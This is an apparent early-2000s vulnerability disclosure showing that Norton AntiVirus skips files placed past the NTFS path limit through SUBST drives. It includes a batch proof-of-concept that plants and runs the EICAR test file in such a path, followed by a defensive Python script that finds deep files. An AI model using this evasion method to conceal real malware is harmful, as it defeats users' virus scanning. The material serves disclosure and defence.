> Long path exploit on NTFS
> =====================
> The filesystem NTFS seems to be a hiding place for viruses if you use a file path which
> exceeds 256 characters.
>
> What is the case?
> The filepath (drive + folderpath + filename) theoretically can take up to 32000 characters if
> the filesystem in use is NTFS. However, in the way in which Windows NT (4.0, 2000 and
> XP) accesses this filesystem, a maximum of 256 characters is in place. If you try to go
> deeper, you will experience a "Path too long" error.
> In these operating systems there is a way to substitute a long folderpath, using
> the "SUBST" command. If you change your current drive to the substituted drive, the
> path length is reset to 3 (Q:\ e.g.) and Windows NT allows you to create an even deeper
> path.
> Normally this would not alarm anyone; however, I discovered that my favorite
> virus scanner (Norton AntiVirus) was not able to follow the deep path where I created the
> EICAR test string. So I created a very simple batch file to demonstrate this exploit.
> My virus scanner will only find this virus if the SUBST drive is available during the scan.
>
> I have tested this on the following platforms:
> Windows NT 4.0 SP4
> Windows NT 4.0 SP6a
> Windows 2000 Professional SP2
> Windows XP Pro
> I have determined that the following versions of Norton AntiVirus will not follow
> the deep path during a complete scan:
> Norton AntiVirus 5.0
> Norton AntiVirus 7.5.1
> Norton AntiVirus 8.00.58
>
> I suspect that other virus scanners will encounter the same "bug", so you might try the
> sample script that I created. Additionally, other tools (quota managers, inventory tools
> etc.) that gather information from an NTFS partition might reveal the same bug.
>
> After running the script below, remove the substituted drive (SUBST Q: /D) and run a
> full scan on your C partition. I suspect that the EICAR virus will not be found.
> Additionally, re-create the substituted drive and re-run the scan. Under normal conditions
> the EICAR virus will be found and removed (depending on your settings).
>
> As far as I can see, there is no real remedy against this exploit. I hope this message will
> pass through the proper channels, so the responsible parties will act on this.
>
> Responses to this posting at my address are welcome.
>
> Hans Somers (hans.somers@nl.abnamro.com)
>
> Sample script:
> ===========
> @echo off
> cls
> echo Start test-script NTFS-limit
> @echo Create a filepath to the limit of NTFS
> md c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\123456789
> cd c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\123456789
> @echo Create the EICAR test-string for PoC. This should be detected normally if you have an active virus scanner.
> echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* >EICAR.TXT
> echo. >>EICAR.TXT
> @echo Activate the EICAR test-string
> copy EICAR.TXT EICAR1.COM >NUL
> @echo Create a subst-drive Q: for this path
> subst Q: c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\123456789
> @echo Create an even deeper filepath (thus exceeding the limit of NTFS's explorer)
> md Q:\1234567890\1234567890\1234567890
> @echo Change current folder into "the deep"
> Q:
> cd Q:\1234567890\1234567890\1234567890
> @echo Create the EICAR test-string
> echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* >EICAR.TXT
> echo. >>EICAR.TXT
> @echo Activate the EICAR test-string
> copy EICAR.TXT EICAR2.COM >NUL
> EICAR2.COM
> echo .
> echo End of test-script
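An added defender-side check, written here as an example and not part of the quoted post: a Python script that resolves a SUBST drive back to its real host path, measures that real length against the Win32 MAX_PATH limit the post runs into, and, on Windows, walks a volume with the extended-length prefix so files past the legacy limit are enumerated instead of stopping at "Path too long". The mapping and paths are constructed from the post's script (Q: pointing at the 226-character folder); QueryDosDeviceW is the real kernel32 call that reports live SUBST mappings.

```python
import os
import re
import sys

MAX_PATH = 260  # Win32 limit; a path string must be shorter than this (NUL counted)

# Constructed from the post's script: the 226-char folder that `subst Q:` points at.
DEEP_BASE = "c:\\temp\\" + "1234567890\\" * 19 + "123456789"
SUBST_MAP = {"Q:": DEEP_BASE}  # constructed mapping, stands in for a live query


def query_subst_map():
    """Windows only: read live SUBST mappings via kernel32 QueryDosDeviceW.
    SUBST targets are reported as '\\??\\<real path>'; elsewhere returns {}."""
    if sys.platform != "win32":
        return {}
    import ctypes
    mapping, buf = {}, ctypes.create_unicode_buffer(4096)
    for letter in "ABCDEFGHIJKLMNOPQRSTUVWXYZ":
        if ctypes.windll.kernel32.QueryDosDeviceW(letter + ":", buf, len(buf)):
            if buf.value.startswith("\\??\\"):
                mapping[letter + ":"] = buf.value[4:]
    return mapping


def resolve_subst(path, subst_map):
    """Rewrite a path on a SUBST drive into the real path on the host volume."""
    m = re.match(r"^([A-Za-z]:)(.*)$", path, re.S)
    if not m or m.group(1).upper() not in subst_map:
        return path
    rest = m.group(2)
    if rest and not rest.startswith("\\"):
        rest = "\\" + rest
    return subst_map[m.group(1).upper()].rstrip("\\") + rest


def exceeds_max_path(path, subst_map):
    """True when the real (SUBST-resolved) path is too long for MAX_PATH-bound
    code, which is where a scanner walking the host volume gives up."""
    return len(resolve_subst(path, subst_map)) >= MAX_PATH


def find_deep_files(root, subst_map):
    """Windows only: walk root with the extended-length prefix so os.walk itself
    is not MAX_PATH-bound, and return the files a legacy scanner would not reach."""
    prefixed = root if root.startswith("\\\\?\\") else "\\\\?\\" + os.path.abspath(root)
    return [os.path.join(d, f) for d, _, fs in os.walk(prefixed) for f in fs
            if exceeds_max_path(os.path.join(d, f)[4:], subst_map)]


if __name__ == "__main__":
    hidden = "Q:\\1234567890\\1234567890\\1234567890\\EICAR2.COM"
    print(len(hidden), "chars via Q:, but", len(resolve_subst(hidden, SUBST_MAP)),
          "on C:; exceeds MAX_PATH:", exceeds_max_path(hidden, SUBST_MAP))
    for hit in (find_deep_files(sys.argv[1], query_subst_map() or SUBST_MAP)
                if len(sys.argv) > 1 else []):
        print(hit)
```

Run with a root such as `C:\` on Windows to list files whose real path a MAX_PATH-bound scanner cannot reach; without an argument it only reports the constructed case from the post (46 characters seen through Q:, 270 on the host volume).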